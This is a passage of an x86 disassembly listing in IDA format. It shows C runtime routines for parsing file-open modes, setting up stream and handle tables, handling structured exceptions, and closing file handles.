arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_427AC4
		push	ebx
		xor	ebx, ebx
		push	esi
		mov	esi, [ebp+arg_4]
		mov	[ebp+var_4], eax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_8], ebx
		mov	[ebp+var_10], ebx
		jmp	short loc_4085D0
; ---------------------------------------------------------------------------

loc_4085CF:				; CODE XREF: sub_4085AF+24j
		inc	esi

loc_4085D0:				; CODE XREF: sub_4085AF+1Ej
		cmp	byte ptr [esi],	20h
		jz	short loc_4085CF
		mov	al, [esi]
		cmp	al, 61h
		jz	short loc_408614
		cmp	al, 72h
		jz	short loc_40860B
		cmp	al, 77h
		jz	short loc_408602
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		xor	eax, eax
		jmp	loc_40884D
; ---------------------------------------------------------------------------

loc_408602:				; CODE XREF: sub_4085AF+32j
		mov	[ebp+arg_4], 301h
		jmp	short loc_40861B
; ---------------------------------------------------------------------------

loc_40860B:				; CODE XREF: sub_4085AF+2Ej
		or	[ebp+var_4], 1
		mov	[ebp+arg_4], ebx
		jmp	short loc_40861F
; ---------------------------------------------------------------------------

loc_408614:				; CODE XREF: sub_4085AF+2Aj
		mov	[ebp+arg_4], 109h

loc_40861B:				; CODE XREF: sub_4085AF+5Aj
		or	[ebp+var_4], 2

loc_40861F:				; CODE XREF: sub_4085AF+63j
		xor	ecx, ecx
		inc	ecx
		inc	esi
		mov	al, [esi]
		cmp	al, bl
		push	edi
		jz	loc_4087E7
		mov	edx, 80h
		mov	edi, 4000h

loc_408638:				; CODE XREF: sub_4085AF+1B6j
		cmp	ecx, ebx
		jz	loc_40876B
		movsx	eax, al
		cmp	eax, 53h
		jg	loc_4086EE
		jz	loc_4086DC
		sub	eax, 20h
		jz	loc_408760
		sub	eax, 0Bh
		jz	short loc_4086B6
		dec	eax
		jz	short loc_4086AA
		sub	eax, 18h
		jz	short loc_408697
		sub	eax, 0Ah
		jz	short loc_40868F
		sub	eax, 4
		jnz	loc_4087F0
		cmp	[ebp+var_8], ebx
		jnz	loc_408755
		or	[ebp+arg_4], 10h
		mov	[ebp+var_8], 1
		jmp	loc_408760
; ---------------------------------------------------------------------------

loc_40868F:				; CODE XREF: sub_4085AF+BCj
		or	[ebp+arg_4], edx
		jmp	loc_408760
; ---------------------------------------------------------------------------

loc_408697:				; CODE XREF: sub_4085AF+B7j
		test	byte ptr [ebp+arg_4], 40h
		jnz	loc_408755
		or	[ebp+arg_4], 40h
		jmp	loc_408760
; ---------------------------------------------------------------------------

loc_4086AA:				; CODE XREF: sub_4085AF+B2j
		mov	[ebp+var_10], 1
		jmp	loc_408755
; ---------------------------------------------------------------------------

loc_4086B6:				; CODE XREF: sub_4085AF+AFj
		test	byte ptr [ebp+arg_4], 2
		jnz	loc_408755
		mov	eax, [ebp+arg_4]
		and	eax, 0FFFFFFFEh
		or	eax, 2
		mov	[ebp+arg_4], eax
		mov	eax, [ebp+var_4]
		and	eax, 0FFFFFFFCh
		or	eax, edx
		mov	[ebp+var_4], eax
		jmp	loc_408760
; ---------------------------------------------------------------------------

loc_4086DC:				; CODE XREF: sub_4085AF+9Dj
		cmp	[ebp+var_8], ebx
		jnz	short loc_408755
		or	[ebp+arg_4], 20h
		mov	[ebp+var_8], 1
		jmp	short loc_408760
; ---------------------------------------------------------------------------

loc_4086EE:				; CODE XREF: sub_4085AF+97j
		sub	eax, 54h
		jz	short loc_40874D
		sub	eax, 0Eh
		jz	short loc_40873C
		dec	eax
		jz	short loc_40872B
		sub	eax, 0Bh
		jz	short loc_408716
		sub	eax, 6
		jnz	loc_4087F0
		test	word ptr [ebp+arg_4], 0C000h
		jnz	short loc_408755
		or	[ebp+arg_4], edi
		jmp	short loc_408760
; ---------------------------------------------------------------------------

loc_408716:				; CODE XREF: sub_4085AF+14Fj
		cmp	[ebp+var_C], ebx
		jnz	short loc_408755
		and	[ebp+var_4], 0FFFFBFFFh
		mov	[ebp+var_C], 1
		jmp	short loc_408760
; ---------------------------------------------------------------------------

loc_40872B:				; CODE XREF: sub_4085AF+14Aj
		cmp	[ebp+var_C], ebx
		jnz	short loc_408755
		or	[ebp+var_4], edi
		mov	[ebp+var_C], 1
		jmp	short loc_408760
; ---------------------------------------------------------------------------

loc_40873C:				; CODE XREF: sub_4085AF+147j
		test	word ptr [ebp+arg_4], 0C000h
		jnz	short loc_408755
		or	[ebp+arg_4], 8000h
		jmp	short loc_408760
; ---------------------------------------------------------------------------

loc_40874D:				; CODE XREF: sub_4085AF+142j
		test	word ptr [ebp+arg_4], 1000h
		jz	short loc_408759

loc_408755:				; CODE XREF: sub_4085AF+CAj
					; sub_4085AF+ECj ...
		xor	ecx, ecx
		jmp	short loc_408760
; ---------------------------------------------------------------------------

loc_408759:				; CODE XREF: sub_4085AF+1A4j
		or	[ebp+arg_4], 1000h

loc_408760:				; CODE XREF: sub_4085AF+A6j
					; sub_4085AF+DBj ...
		inc	esi
		mov	al, [esi]
		cmp	al, bl
		jnz	loc_408638

loc_40876B:				; CODE XREF: sub_4085AF+8Bj
		cmp	[ebp+var_10], ebx
		jz	short loc_4087E7
		jmp	short loc_408773
; ---------------------------------------------------------------------------

loc_408772:				; CODE XREF: sub_4085AF+1C7j
		inc	esi

loc_408773:				; CODE XREF: sub_4085AF+1C1j
		cmp	byte ptr [esi],	20h
		jz	short loc_408772
		push	4
		push	esi
		push	offset aCcs	; "ccs="
		call	sub_40EEE0
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_4087F0
		add	esi, 4
		push	offset aUtf8	; "UTF-8"
		push	esi
		call	sub_40ED64
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_4087AC
		add	esi, 5
		or	[ebp+arg_4], 40000h
		jmp	short loc_4087E7
; ---------------------------------------------------------------------------

loc_4087AC:				; CODE XREF: sub_4085AF+1EFj
		push	offset aUtf16le	; "UTF-16LE"
		push	esi
		call	sub_40ED64
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_4087C9
		add	esi, 8
		or	[ebp+arg_4], 20000h
		jmp	short loc_4087E7
; ---------------------------------------------------------------------------

loc_4087C9:				; CODE XREF: sub_4085AF+20Cj
		push	offset aUnicode	; "UNICODE"
		push	esi
		call	sub_40ED64
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_4087F0
		add	esi, 7
		or	[ebp+arg_4], 10000h
		jmp	short loc_4087E7
; ---------------------------------------------------------------------------

loc_4087E6:				; CODE XREF: sub_4085AF+23Bj
		inc	esi

loc_4087E7:				; CODE XREF: sub_4085AF+79j
					; sub_4085AF+1BFj ...
		cmp	byte ptr [esi],	20h
		jz	short loc_4087E6
		cmp	[esi], bl
		jz	short loc_40880A

loc_4087F0:				; CODE XREF: sub_4085AF+C1j
					; sub_4085AF+154j ...
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		jmp	short loc_408828
; ---------------------------------------------------------------------------

loc_40880A:				; CODE XREF: sub_4085AF+23Fj
		push	180h
		push	[ebp+arg_8]
		lea	eax, [ebp+var_10]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	eax
		call	sub_40EB2C
		add	esp, 14h
		test	eax, eax
		jz	short loc_40882C

loc_408828:				; CODE XREF: sub_4085AF+259j
		xor	eax, eax
		jmp	short loc_40884C
; ---------------------------------------------------------------------------

loc_40882C:				; CODE XREF: sub_4085AF+277j
		mov	eax, [ebp+arg_C]
		inc	dword_427608
		mov	ecx, [ebp+var_4]
		mov	[eax+0Ch], ecx
		mov	ecx, [ebp+var_10]
		mov	[eax+4], ebx
		mov	[eax], ebx
		mov	[eax+8], ebx
		mov	[eax+1Ch], ebx
		mov	[eax+10h], ecx

loc_40884C:				; CODE XREF: sub_4085AF+27Bj
		pop	edi

loc_40884D:				; CODE XREF: sub_4085AF+4Ej
		pop	esi
		pop	ebx
		leave
		retn
sub_4085AF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408851	proc near		; CODE XREF: sub_4034F0+54p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	10h
		push	offset dword_421848
		call	__SEH_prolog4
		xor	ebx, ebx
		xor	edi, edi
		mov	[ebp+var_1C], edi
		push	1
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		xor	esi, esi

loc_408871:				; CODE XREF: sub_408851+85j
		mov	[ebp+var_20], esi
		cmp	esi, dword_436420
		jge	loc_408941
		mov	eax, dword_435400
		lea	eax, [eax+esi*4]
		cmp	[eax], ebx
		jz	short loc_4088DC
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jnz	short loc_4088D5
		lea	eax, [esi-3]
		cmp	eax, 10h
		ja	short loc_4088AE
		lea	eax, [esi+10h]
		push	eax
		call	sub_405CE4
		pop	ecx
		test	eax, eax
		jz	loc_408941

loc_4088AE:				; CODE XREF: sub_408851+49j
		mov	eax, dword_435400
		push	dword ptr [eax+esi*4]
		push	esi
		call	sub_40853A
		pop	ecx
		pop	ecx
		mov	eax, dword_435400
		mov	eax, [eax+esi*4]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_4088D8
		push	eax
		push	esi
		call	sub_40858C
		pop	ecx
		pop	ecx

loc_4088D5:				; CODE XREF: sub_408851+41j
		inc	esi
		jmp	short loc_408871
; ---------------------------------------------------------------------------

loc_4088D8:				; CODE XREF: sub_408851+79j
		mov	edi, eax
		jmp	short loc_40893E
; ---------------------------------------------------------------------------

loc_4088DC:				; CODE XREF: sub_408851+39j
		shl	esi, 2
		push	38h
		call	sub_407AEA
		pop	ecx
		mov	ecx, dword_435400
		mov	[esi+ecx], eax
		mov	eax, dword_435400
		add	eax, esi
		cmp	[eax], ebx
		jz	short loc_408941
		push	0FA0h
		mov	eax, [eax]
		add	eax, 20h
		push	eax
		call	sub_40CEC4
		pop	ecx
		pop	ecx
		test	eax, eax
		mov	eax, dword_435400
		jnz	short loc_408929
		push	dword ptr [esi+eax]
		call	sub_4039C3
		pop	ecx
		mov	eax, dword_435400
		mov	[esi+eax], ebx
		jmp	short loc_408941
; ---------------------------------------------------------------------------

loc_408929:				; CODE XREF: sub_408851+C3j
		mov	eax, [esi+eax]
		add	eax, 20h
		push	eax
		call	ds:dword_41D164	; RtlEnterCriticalSection
		mov	eax, dword_435400
		mov	edi, [esi+eax]

loc_40893E:				; CODE XREF: sub_408851+89j
		mov	[ebp+var_1C], edi

loc_408941:				; CODE XREF: sub_408851+29j
					; sub_408851+57j ...
		cmp	edi, ebx
		jz	short loc_408957
		mov	[edi+4], ebx
		mov	[edi+0Ch], ebx
		mov	[edi+8], ebx
		mov	[edi], ebx
		mov	[edi+1Ch], ebx
		or	dword ptr [edi+10h], 0FFFFFFFFh

loc_408957:				; CODE XREF: sub_408851+F2j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40896E
		mov	eax, edi
		call	__SEH_epilog4
		retn
sub_408851	endp


; =============== S U B	R O U T	I N E =======================================



sub_40896B	proc near		; DATA XREF: _1fieagrn:00421860o
		mov	edi, [ebp-1Ch]
sub_40896B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40896E	proc near		; CODE XREF: sub_408851+10Dp
		push	1
		call	sub_405CCF
		pop	ecx
		retn
sub_40896E	endp

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_408978	proc near		; CODE XREF: sub_4034F0+8Ap
					; sub_408978+BDp ...

var_20		= dword	ptr -20h
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	ebx
		push	esi
		push	edi
		mov	edx, [esp+0Ch+arg_0]
		mov	eax, [esp+0Ch+arg_4]
		mov	ecx, [esp+0Ch+arg_8]
		push	ebp
		push	edx
		push	eax
		push	ecx
		push	ecx
		push	offset loc_408A08
		push	large dword ptr	fs:0
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+28h+var_20], eax
		mov	large fs:0, esp

loc_4089AA:				; CODE XREF: sub_408978+64j
					; sub_408978+80j
		mov	eax, [esp+28h+arg_4]
		mov	ebx, [eax+8]
		mov	ecx, [esp+28h+arg_0]
		xor	ebx, [ecx]
		mov	esi, [eax+0Ch]
		cmp	esi, 0FFFFFFFEh
		jz	short loc_4089FA
		mov	edx, [esp+28h+arg_8]
		cmp	edx, 0FFFFFFFEh
		jz	short loc_4089CC
		cmp	esi, edx
		jbe	short loc_4089FA

loc_4089CC:				; CODE XREF: sub_408978+4Ej
		lea	esi, [esi+esi*2]
		lea	ebx, [ebx+esi*4+10h]
		mov	ecx, [ebx]
		mov	[eax+0Ch], ecx
		cmp	dword ptr [ebx+4], 0
		jnz	short loc_4089AA
		push	101h
		mov	eax, [ebx+8]
		call	sub_40F00D
		mov	ecx, 1
		mov	eax, [ebx+8]
		call	sub_40F02C
		jmp	short loc_4089AA
; ---------------------------------------------------------------------------

loc_4089FA:				; CODE XREF: sub_408978+45j
					; sub_408978+52j
		pop	large dword ptr	fs:0
		add	esp, 18h
		pop	edi
		pop	esi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_408A08:				; DATA XREF: sub_408978+14o
		mov	ecx, [esp+arg_0]
		test	dword ptr [ecx+4], 6
		mov	eax, 1
		jz	short locret_408A4D
		mov	eax, [esp+arg_4]
		mov	ecx, [eax+8]
		xor	ecx, eax
		call	sub_402AD0
		push	ebp
		mov	ebp, [eax+18h]
		push	dword ptr [eax+0Ch]
		push	dword ptr [eax+10h]
		push	dword ptr [eax+14h]
		call	sub_408978
		add	esp, 0Ch
		pop	ebp
		mov	eax, [esp+arg_4]
		mov	edx, [esp+arg_C]
		mov	[edx], eax
		mov	eax, 3

locret_408A4D:				; CODE XREF: sub_408978+A0j
		retn
sub_408978	endp

; ---------------------------------------------------------------------------
		push	ebp
		mov	ecx, [esp+8]
		mov	ebp, [ecx]
		push	dword ptr [ecx+1Ch]
		push	dword ptr [ecx+18h]
		push	dword ptr [ecx+28h]
		call	sub_408978
		add	esp, 0Ch
		pop	ebp
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_408A6A	proc near		; CODE XREF: sub_4069F0+89p
		push	ebp
		push	esi
		push	edi
		push	ebx
		mov	ebp, edx
		xor	eax, eax
		xor	ebx, ebx
		xor	edx, edx
		xor	esi, esi
		xor	edi, edi
		call	ecx
		pop	ebx
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_408A6A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4069F0

loc_408A81:				; CODE XREF: sub_4069F0+170j
		mov	ebp, edx
		mov	esi, ecx
		mov	eax, ecx
		push	1
		call	sub_40F00D
		xor	eax, eax
		xor	ebx, ebx
		xor	ecx, ecx
		xor	edx, edx
		xor	edi, edi
		jmp	esi
; END OF FUNCTION CHUNK	FOR sub_4069F0

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408A9A	proc near		; CODE XREF: sub_4069F0+11Fp
		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		push	0
		push	0
		push	offset loc_408AAF
		push	ecx
		call	sub_413D26

loc_408AAF:				; DATA XREF: sub_408A9A+Ao
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_408A9A	endp


; =============== S U B	R O U T	I N E =======================================



sub_408AB4	proc near		; CODE XREF: sub_4069F0+137p
					; sub_4069F0+18Cp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebp
		mov	ebp, [esp+4+arg_0]
		push	edx
		push	ecx
		push	[esp+0Ch+arg_4]
		call	sub_408978
		add	esp, 0Ch
		pop	ebp
		retn	8
sub_408AB4	endp


; =============== S U B	R O U T	I N E =======================================



sub_408ACB	proc near		; CODE XREF: sub_4035C7+10Ep

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	esi
		call	sub_408DD0
		push	eax
		call	sub_40D8F0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_408B5D
		call	sub_408434
		add	eax, 20h
		cmp	esi, eax
		jnz	short loc_408AF2
		xor	eax, eax
		jmp	short loc_408B01
; ---------------------------------------------------------------------------

loc_408AF2:				; CODE XREF: sub_408ACB+21j
		call	sub_408434
		add	eax, 40h
		cmp	esi, eax
		jnz	short loc_408B5D
		xor	eax, eax
		inc	eax

loc_408B01:				; CODE XREF: sub_408ACB+25j
		inc	dword_427608
		test	word ptr [esi+0Ch], 10Ch
		jnz	short loc_408B5D
		push	ebx
		push	edi
		lea	edi, ds:42760Ch[eax*4]
		cmp	dword ptr [edi], 0
		mov	ebx, 1000h
		jnz	short loc_408B42
		push	ebx
		call	sub_407AEA
		test	eax, eax
		pop	ecx
		mov	[edi], eax
		jnz	short loc_408B42
		lea	eax, [esi+14h]
		push	2
		mov	[esi+8], eax
		mov	[esi], eax
		pop	eax
		mov	[esi+18h], eax
		mov	[esi+4], eax
		jmp	short loc_408B4F
; ---------------------------------------------------------------------------

loc_408B42:				; CODE XREF: sub_408ACB+55j
					; sub_408ACB+62j
		mov	edi, [edi]
		mov	[esi+8], edi
		mov	[esi], edi
		mov	[esi+18h], ebx
		mov	[esi+4], ebx

loc_408B4F:				; CODE XREF: sub_408ACB+75j
		or	dword ptr [esi+0Ch], 1102h
		pop	edi
		xor	eax, eax
		pop	ebx
		inc	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_408B5D:				; CODE XREF: sub_408ACB+15j
					; sub_408ACB+31j ...
		xor	eax, eax
		pop	esi
		retn
sub_408ACB	endp


; =============== S U B	R O U T	I N E =======================================



sub_408B61	proc near		; CODE XREF: sub_4035C7+128p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 0
		jz	short locret_408B8F
		push	esi
		mov	esi, [esp+4+arg_4]
		test	word ptr [esi+0Ch], 1000h
		jz	short loc_408B8E
		push	esi
		call	sub_408F8A
		and	dword ptr [esi+0Ch], 0FFFFEEFFh
		and	dword ptr [esi+18h], 0
		and	dword ptr [esi], 0
		and	dword ptr [esi+8], 0
		pop	ecx

loc_408B8E:				; CODE XREF: sub_408B61+12j
		pop	esi

locret_408B8F:				; CODE XREF: sub_408B61+5j
		retn
sub_408B61	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408B90	proc near		; CODE XREF: sub_4044D2-E4p

var_64		= byte ptr -64h
var_32		= word ptr -32h
var_30		= dword	ptr -30h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	54h
		push	offset dword_421868
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+ms_exc.disabled], edi
		lea	eax, [ebp+var_64]
		push	eax
		call	ds:off_41D1A8
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		push	28h
		push	20h
		pop	esi
		push	esi
		call	sub_407B2A
		pop	ecx
		pop	ecx
		cmp	eax, edi
		jz	loc_408DC7
		mov	dword_435300, eax
		mov	dword_4352E8, esi
		lea	ecx, [eax+500h]
		jmp	short loc_408C03
; ---------------------------------------------------------------------------

loc_408BDA:				; CODE XREF: sub_408B90+75j
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		mov	[eax+8], edi
		mov	byte ptr [eax+24h], 0
		mov	byte ptr [eax+25h], 0Ah
		mov	byte ptr [eax+26h], 0Ah
		add	eax, 28h
		mov	ecx, dword_435300
		add	ecx, 500h

loc_408C03:				; CODE XREF: sub_408B90+48j
		cmp	eax, ecx
		jb	short loc_408BDA
		cmp	[ebp+var_32], di
		jz	loc_408D0E
		mov	eax, [ebp+var_30]
		cmp	eax, edi
		jz	loc_408D0E
		mov	edi, [eax]
		lea	ebx, [eax+4]
		lea	eax, [ebx+edi]
		mov	[ebp+var_1C], eax
		mov	eax, 800h
		cmp	edi, eax
		jl	short loc_408C32
		mov	edi, eax

loc_408C32:				; CODE XREF: sub_408B90+9Ej
		xor	esi, esi
		inc	esi
		jmp	short loc_408C89
; ---------------------------------------------------------------------------

loc_408C37:				; CODE XREF: sub_408B90+FFj
		push	28h
		push	20h
		call	sub_407B2A
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_408C93
		lea	ecx, ds:435300h[esi*4]
		mov	[ecx], eax
		add	dword_4352E8, 20h
		lea	edx, [eax+500h]
		jmp	short loc_408C84
; ---------------------------------------------------------------------------

loc_408C5E:				; CODE XREF: sub_408B90+F6j
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		and	dword ptr [eax+8], 0
		and	byte ptr [eax+24h], 80h
		mov	byte ptr [eax+25h], 0Ah
		mov	byte ptr [eax+26h], 0Ah
		add	eax, 28h
		mov	edx, [ecx]
		add	edx, 500h

loc_408C84:				; CODE XREF: sub_408B90+CCj
		cmp	eax, edx
		jb	short loc_408C5E
		inc	esi

loc_408C89:				; CODE XREF: sub_408B90+A5j
		cmp	dword_4352E8, edi
		jl	short loc_408C37
		jmp	short loc_408C99
; ---------------------------------------------------------------------------

loc_408C93:				; CODE XREF: sub_408B90+B4j
		mov	edi, dword_4352E8

loc_408C99:				; CODE XREF: sub_408B90+101j
		and	[ebp+var_20], 0
		test	edi, edi
		jle	short loc_408D0E

loc_408CA1:				; CODE XREF: sub_408B90+17Cj
		mov	eax, [ebp+var_1C]
		mov	ecx, [eax]
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_408D01
		cmp	ecx, 0FFFFFFFEh
		jz	short loc_408D01
		mov	al, [ebx]
		test	al, 1
		jz	short loc_408D01
		test	al, 8
		jnz	short loc_408CC5
		push	ecx
		call	ds:dword_41D144	; GetFileType
		test	eax, eax
		jz	short loc_408D01

loc_408CC5:				; CODE XREF: sub_408B90+128j
		mov	esi, [ebp+var_20]
		mov	eax, esi
		sar	eax, 5
		and	esi, 1Fh
		imul	esi, 28h
		add	esi, dword_435300[eax*4]
		mov	eax, [ebp+var_1C]
		mov	eax, [eax]
		mov	[esi], eax
		mov	al, [ebx]
		mov	[esi+4], al
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40CEC4
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_408DC7
		inc	dword ptr [esi+8]

loc_408D01:				; CODE XREF: sub_408B90+119j
					; sub_408B90+11Ej ...
		inc	[ebp+var_20]
		inc	ebx
		add	[ebp+var_1C], 4
		cmp	[ebp+var_20], edi
		jl	short loc_408CA1

loc_408D0E:				; CODE XREF: sub_408B90+7Bj
					; sub_408B90+86j ...
		xor	ebx, ebx

loc_408D10:				; CODE XREF: sub_408B90+213j
		mov	esi, ebx
		imul	esi, 28h
		add	esi, dword_435300
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_408D2D
		cmp	eax, 0FFFFFFFEh
		jz	short loc_408D2D
		or	byte ptr [esi+4], 80h
		jmp	short loc_408D9F
; ---------------------------------------------------------------------------

loc_408D2D:				; CODE XREF: sub_408B90+190j
					; sub_408B90+195j
		mov	byte ptr [esi+4], 81h
		test	ebx, ebx
		jnz	short loc_408D3A
		push	0FFFFFFF6h
		pop	eax
		jmp	short loc_408D44
; ---------------------------------------------------------------------------

loc_408D3A:				; CODE XREF: sub_408B90+1A3j
		mov	eax, ebx
		dec	eax
		neg	eax
		sbb	eax, eax
		add	eax, 0FFFFFFF5h

loc_408D44:				; CODE XREF: sub_408B90+1A8j
		push	eax
		call	ds:dword_41D148	; GetStdHandle
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jz	short loc_408D95
		test	edi, edi
		jz	short loc_408D95
		push	edi
		call	ds:dword_41D144	; GetFileType
		test	eax, eax
		jz	short loc_408D95
		mov	[esi], edi
		and	eax, 0FFh
		cmp	eax, 2
		jnz	short loc_408D73
		or	byte ptr [esi+4], 40h
		jmp	short loc_408D7C
; ---------------------------------------------------------------------------

loc_408D73:				; CODE XREF: sub_408B90+1DBj
		cmp	eax, 3
		jnz	short loc_408D7C
		or	byte ptr [esi+4], 8

loc_408D7C:				; CODE XREF: sub_408B90+1E1j
					; sub_408B90+1E6j
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40CEC4
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_408DC7
		inc	dword ptr [esi+8]
		jmp	short loc_408D9F
; ---------------------------------------------------------------------------

loc_408D95:				; CODE XREF: sub_408B90+1C0j
					; sub_408B90+1C4j ...
		or	byte ptr [esi+4], 40h
		mov	dword ptr [esi], 0FFFFFFFEh

loc_408D9F:				; CODE XREF: sub_408B90+19Bj
					; sub_408B90+203j
		inc	ebx
		cmp	ebx, 3
		jl	loc_408D10
		push	dword_4352E8
		call	ds:dword_41D14C	; LockResource
		xor	eax, eax
		jmp	short loc_408DCA
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_408DC7:				; CODE XREF: sub_408B90+31j
					; sub_408B90+168j ...
		or	eax, 0FFFFFFFFh

loc_408DCA:				; CODE XREF: sub_408B90+227j
		call	__SEH_epilog4
		retn
sub_408B90	endp


; =============== S U B	R O U T	I N E =======================================



sub_408DD0	proc near		; CODE XREF: sub_4035C7+63p
					; sub_4035C7+6Fp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_408DF8
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_408DF8:				; CODE XREF: sub_408DD0+9j
		mov	eax, [eax+10h]
		pop	esi
		retn
sub_408DD0	endp


; =============== S U B	R O U T	I N E =======================================



sub_408DFD	proc near		; CODE XREF: sub_408E91+94p
					; sub_40E422+340p ...

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		push	esi
		call	sub_40F12D
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_408E5C
		cmp	esi, 1
		mov	eax, dword_435300
		jnz	short loc_408E1F
		test	byte ptr [eax+54h], 1
		jnz	short loc_408E2A

loc_408E1F:				; CODE XREF: sub_408DFD+1Aj
		cmp	esi, 2
		jnz	short loc_408E40
		test	byte ptr [eax+2Ch], 1
		jz	short loc_408E40

loc_408E2A:				; CODE XREF: sub_408DFD+20j
		push	2
		call	sub_40F12D
		push	1
		mov	edi, eax
		call	sub_40F12D
		cmp	eax, edi
		pop	ecx
		pop	ecx
		jz	short loc_408E5C

loc_408E40:				; CODE XREF: sub_408DFD+25j
					; sub_408DFD+2Bj
		push	esi
		call	sub_40F12D
		pop	ecx
		push	eax
		call	ds:dword_41D0D8	; CloseHandle
		test	eax, eax
		jnz	short loc_408E5C
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		mov	edi, eax
		jmp	short loc_408E5E
; ---------------------------------------------------------------------------

loc_408E5C:				; CODE XREF: sub_408DFD+10j
					; sub_408DFD+41j ...
		xor	edi, edi

loc_408E5E:				; CODE XREF: sub_408DFD+5Dj
		push	esi
		call	sub_40F0AC
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		test	edi, edi
		mov	eax, dword_435300[eax*4]
		pop	ecx
		mov	byte ptr [eax+esi+4], 0
		jz	short loc_408E8C
		push	edi
		call	sub_405BA9
		pop	ecx
		or	eax, 0FFFFFFFFh
		jmp	short loc_408E8E
; ---------------------------------------------------------------------------

loc_408E8C:				; CODE XREF: sub_408DFD+81j
		xor	eax, eax

loc_408E8E:				; CODE XREF: sub_408DFD+8Dj
		pop	edi
		pop	esi
		retn
sub_408DFD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408E91	proc near		; CODE XREF: sub_403811+48p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_421888
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_408EC0
		call	sub_405B96
		and	dword ptr [eax], 0
		call	sub_405B83
		mov	dword ptr [eax], 9

loc_408EB8:				; CODE XREF: sub_408E91+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_408F4E
; ---------------------------------------------------------------------------

loc_408EC0:				; CODE XREF: sub_408E91+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_408ECE
		cmp	eax, dword_4352E8
		jb	short loc_408EEF

loc_408ECE:				; CODE XREF: sub_408E91+33j
					; sub_408E91+7Cj
		call	sub_405B96
		mov	[eax], edi
		call	sub_405B83
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		jmp	short loc_408EB8
; ---------------------------------------------------------------------------

loc_408EEF:				; CODE XREF: sub_408E91+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:435300h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
